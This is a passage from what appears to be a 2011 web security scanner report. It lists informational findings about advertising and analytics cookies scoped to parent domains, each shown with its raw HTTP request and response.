Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe1aYhlCGP6Vy1ExkNK7HUtFp4B4dlWpgdiiNEFpEQNZ6MT8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8Vej6qfzVOzTItNJRFsRyXovJB740eR263MFWr1XIQIIGVb5GOMA1TQtwBiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 511
Connection: keep-alive

dj.module.ad.bio.loadBizoData({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_syst
...[SNIP]...

11.9. http://ar.voicefive.com/b/recruitBeacon.pli  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/recruitBeacon.pli

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/recruitBeacon.pli?pid=p104567837&PRAd=63567820&AR_C=42361216 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; BMX_BR=pid=p104567837&prad=63567813&arc=42361216&exp=1307964868; ar_p104567837=exp=1&initExp=Mon Jun 13 11:34:28 2011&recExp=Mon Jun 13 11:34:28 2011&prad=63567813&arc=42361216&; UID=4a757a7-24.143.206.42-1305663172

Response

HTTP/1.1 302 Redirect
Server: nginx
Date: Tue, 14 Jun 2011 00:16:20 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010580; expires=Wed 15-Jun-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Set-Cookie: ar_p104567837=exp=3&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:16:20 2011&prad=63567820&arc=42361216&; expires=Mon 12-Sep-2011 00:16:20 GMT; path=/; domain=.voicefive.com;
Location: http://b.voicefive.com/p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=3&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010580
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent
Content-Length: 0


11.10. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6036034&rn=828106784&c12=781821643-1552181814-1307987147375&c7=http%3A%2F%2Fwww.mtv.com%2Fontv%2F&c4=%2Fontv%2F&c5=20000&c8=MTV%20Original%20Shows%2C%20Reality%20TV%20Shows%20%7C%20Episode&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/ontv/
Cookie: UID=f68656b-184.84.69.32-1306935678

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 13 Jun 2011 17:45:52 GMT
Connection: close
Set-Cookie: UID=f68656b-184.84.69.32-1306935678; expires=Wed, 12-Jun-2013 17:45:52 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


11.11. http://b.scorecardresearch.com/r  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6035148&d.c=gif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:56 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.12. http://b.voicefive.com/p  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=4&c2=p104567837&c3=63567820&c4=42361216&c5=&c6=2&c7=Mon%20Jun%2013%2011%3A34%3A28%202011&c8=&c9=&c10=&c15=&rn=1308010528 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p97174789=exp=4&initExp=Tue May 17 20:12:51 2011&recExp=Sat May 21 12:34:25 2011&prad=253735209&arc=207615215&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p82806590=exp=6&initExp=Sat May 21 12:32:31 2011&recExp=Mon Jun 6 10:11:46 2011&prad=64304737&arc=40380915&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; UID=4a757a7-24.143.206.42-1305663172; BMX_BR=pid=p104567837&prad=63567820&arc=42361216&exp=1308010528; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Pragma: no-cache
Date: Tue, 14 Jun 2011 00:16:55 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Thu, 13-Jun-2013 00:16:55 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

11.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2713133&PluID=0&e=0&w=300&h=250&ord=3138287&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/i%3B239895957%3B0-0%3B0%3B15527176%3B4307-300/250%3B42522129/42539916/1%3B%3B%7Eokv%3D%3B%3Bs%3D8_10001%3Bmc%3Db2pfreezone%3Btile%3D6%3Bsz%3D336x280%2C300x250%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnu035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+afDX0000000002uK990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzt06hH00002jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnt035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+amoJ0000000002v5a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close
Content-Length: 2180

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

11.14. http://c.microsoft.com/trans_pixel.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://c.microsoft.com
Path:   /trans_pixel.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trans_pixel.asp?type=pv HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/products/ie/home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MS0=52319cad089b46ffaf7cb2f75a658057; domain=.microsoft.com; expires=Tue, 14-Jun-2011 01:04:16 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:16 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

11.15. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=4&gen=1000&gen=100&sid=4df74dbbd76c223d&callback=_ate.ad.hrr&pub=xa-4a9728942b1daf7e&uid=4dce8a530508b02d&url=http%3A%2F%2Fchartupload.com%2F&ref=http%3A%2F%2Fwww.livewithoscar.com%2FCalendar.aspx&1o71l2i HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh44.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1306359996.1OD|1307911311.60|1307911311.1EY; dt=X; psc=1; uid=4dce8a530508b02d; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Tue, 14 Jun 2011 12:02:05 GMT
Set-Cookie: di=%7B%222%22%3A%222814750682866683%2CrcHW803OVbgACmEf%22%7D..1307911311.1FE|1307911311.60|1307911311.1EY|1306359996.1OD; Domain=.addthis.com; Expires=Thu, 13-Jun-2013 12:02:05 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Thu, 14-Jul-2011 12:02:05 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Tue, 14 Jun 2011 12:02:04 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});

11.16. http://cm.mtv.overture.com/js_flat_1_0/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /js_flat_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?source=viacom_mtv_ctxt&outputCharEnc=latin1&ctxtUrl=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&cb=5789&config=1458724563&maxCount=3 HTTP/1.1
Host: cm.mtv.overture.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=392qmnl6tfcas&b=3&s=n2; UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwNHCwNXIycAVxhWCw0=

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:17 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: UserData=02u3hs9yoaLQsFTjBpdHN1MjJzNHI0tDS0NnBUdk%2bLSi4sTU1JNbEBAGNDCwMLJ1NjMxMAM7FV5gw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Fri, 11-Jun-2021 00:18:18 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=ISO-8859-1
Content-Length: 181

zCn = "";
zRef = "";
zSr = new Array("Reach 80% of active Internet users with Yahoo!.",
"",
"",
"Ads by Yahoo!",
"http://info.yahoo.com/services/us/yahoo/ads/details.html",
"");


11.17. http://en.wordpress.com/signup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wordpress.com
Path:   /signup/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /signup/?ref=bottomtext HTTP/1.1
Host: en.wordpress.com
Proxy-Connection: keep-alive
Referer: http://wordpress.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=11735858.1306026914.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11735858.346046317.1306026914.1306026914.1306026914.1; __gads=ID=f0b3fa9d26834653:T=1306026913:S=ALNI_MZ0OMj1z1zmHsmoQjjRWjvET1tf7Q; __qca=P0-326664433-1306026921591; optimizelyEndUserId=oeu1308011432464r0.4658326841890812; optimizelyBuckets=%7B%7D

Response

HTTP/1.1 302 Found
Server: nginx
Date: Tue, 14 Jun 2011 00:31:10 GMT
Content-Type: text/html
Connection: close
X-hacker: If you're reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Set-Cookie: ref=bottomtext; path=/; domain=wordpress.com
Location: https://en.wordpress.com/signup/
Vary: Accept-Encoding
Content-Length: 0


11.18. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=13&seg=49740&action=as(133789898);as(133443903);as(133663613);&redir=http%3a%2f%2fad.yieldmanager.com%2fpixel%3fadv%3d95413%26t%3d2%26id%3d1203653%26id%3d1203654%26id%3d1203953 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3106981;type=forex803;cat=forex519;ord=1;num=1308052950?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
